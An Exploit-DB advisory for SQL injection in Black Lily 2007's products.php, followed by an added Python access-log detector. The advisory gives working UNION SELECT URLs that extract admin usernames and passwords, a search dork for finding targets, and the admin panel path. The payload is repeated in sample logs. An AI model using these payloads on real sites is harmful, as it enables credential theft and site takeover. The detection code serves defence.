Black Lily 2007 - 'products.php?class' SQL Injection

EDB-ID: 4444
CVE: N/A
Platform: PHP
Date: 2007-09-22


#######################SnIper-sa.com################################
#                                                                  #
#  SSSSS      nnn        nn   ii  ppppppp  eeeeeeeee   rrrrr       #
# ss          nn nn      nn   ii  pp    p  ee          rr   rr     #
#s            nn  nn     nn   ii  pp    p  ee          rr     r    #
# ss          nn   nn    nn   ii  ppppppp  ee          rr   rr     #
#   sssss     nn    nn   nn   ii  pp       eeeeee      rrrr        #
#        ss   nn     nn  nn   ii  pp       ee          rrrr        #
#          s  nn      nn nn   ii  pp       ee          rr  rr      #
#        ss   nn        nnn   ii  pp       ee          rr   rr     #
#   sssss     nn        nnn   ii  pp       eeeeeeeeee  rr     rr   #
#                                                                  #
#####################VerY-SecReT####################################
####################################

 Found by : VerY SecReT
###########
HomePage : WwW.SnIpEr-Sa.Com
##################

 Dork :  "Powered By The Black Lily 2007"
####################################

EXPLOIT:
  http://victim.com/ar/products.php?class=-1%20union%20select%201,2,password,4,username%20from%20admin/*

 or

http://victim.com/en/products.php?class=-1%20union%20select%201,2,3,password,username%20from%20admin/*

########################################

Admin panel is at  http://victim.com/xx/admin/

#####################################

 S.GreetZ: sniper-sa.com & sniper-sa & Rafoo
#############################
thanx :  shoot3r , Devil-X ,ReMOTeR , and all sniper members

##############

contact-mail : SecReT@SecuRitY.Com.Sa

# milw0rm.com [2007-09-22]
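
Added example, not part of the original advisory or of the Black Lily code: a log check that flags requests to products.php whose `class` parameter is not a plain integer, which is what the requests above look like in a web server access log. It assumes combined-format access logs and that legitimate `class` values are non-negative integers; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# The script the advisory names, under any directory (/ar/, /en/, ...).
PRODUCTS_RE = re.compile(r'/products\.php$', re.IGNORECASE)
# Assumption: a legitimate class id is a short non-negative integer.
VALID_CLASS_RE = re.compile(r'\d{1,9}')

def suspicious_class_value(line):
    """Return the decoded `class` value if it is not a plain integer, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not PRODUCTS_RE.search(url.path):
        return None
    # parse_qs percent-decodes once; keep blank values so `class=` is checked too.
    for value in parse_qs(url.query, keep_blank_values=True).get("class", []):
        if not VALID_CLASS_RE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_class_value) for every flagged log line."""
    hits = []
    for line in lines:
        value = suspicious_class_value(line)
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits

# Constructed sample log lines (documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Sep/2007:10:00:01 +0000] "GET /en/products.php?class=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [22/Sep/2007:10:00:05 +0000] "GET /ar/products.php?class=-1%20union%20select%201,2,password,4,username%20from%20admin/* HTTP/1.1" 200 812',
    '192.0.2.10 - - [22/Sep/2007:10:00:09 +0000] "GET /en/index.php?class=abc HTTP/1.1" 200 900',
    '203.0.113.4 - - [22/Sep/2007:10:00:12 +0000] "GET /en/products.php?class=2%2527 HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(ip, repr(value))
```

The same integer-only rule, applied in products.php before the value reaches the query, is the fix for the injection itself.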